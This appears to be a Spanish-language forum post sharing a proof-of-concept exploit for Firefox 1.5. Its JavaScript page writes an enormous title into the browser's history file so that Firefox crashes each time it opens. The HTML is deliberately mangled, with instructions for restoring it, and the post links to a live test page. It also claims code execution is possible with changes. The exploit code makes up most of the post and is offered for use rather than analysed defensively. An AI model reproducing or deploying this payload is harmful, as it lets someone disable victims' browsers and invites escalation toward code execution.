Firefox 1.5 buffer overflow

Básicamente firefox logea todos los datos de una URL en el archivo de historia.dat, este pequeño
script pondrá una data realmente grande y Firefox entonces salvarán esa data en historia.dat. La próxima vez que el firefox se abre,se ¨colgara¨ instantáneamente debido a un buffer overflow -- esto sucederá cada vez, hasta que ustedes borren manualmente el archivo de historia.dat

Esta prueba del concepto solo impide que alguien pueda volver a abrir su browser despues de ejecutar el exploit. En concreto se trataria de Denial Of Service, sin embargo es posible la ejecucion de codigo con algunas modificaciones.

Codigo:
/html/\head/\title/Hola\/title/\script type="text/javascript"/
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
\/script/\/head/\body/MouseHack Dice \a href="javascript:ex();"/CLICK AQUI
\/a/\/body/\/html
Para probar si sos vulnerable:

http://mousehack.noads.info/Fire15.html

Salu2

PD:remplazar las ¨\¨ por ¨<->¨ correspondientes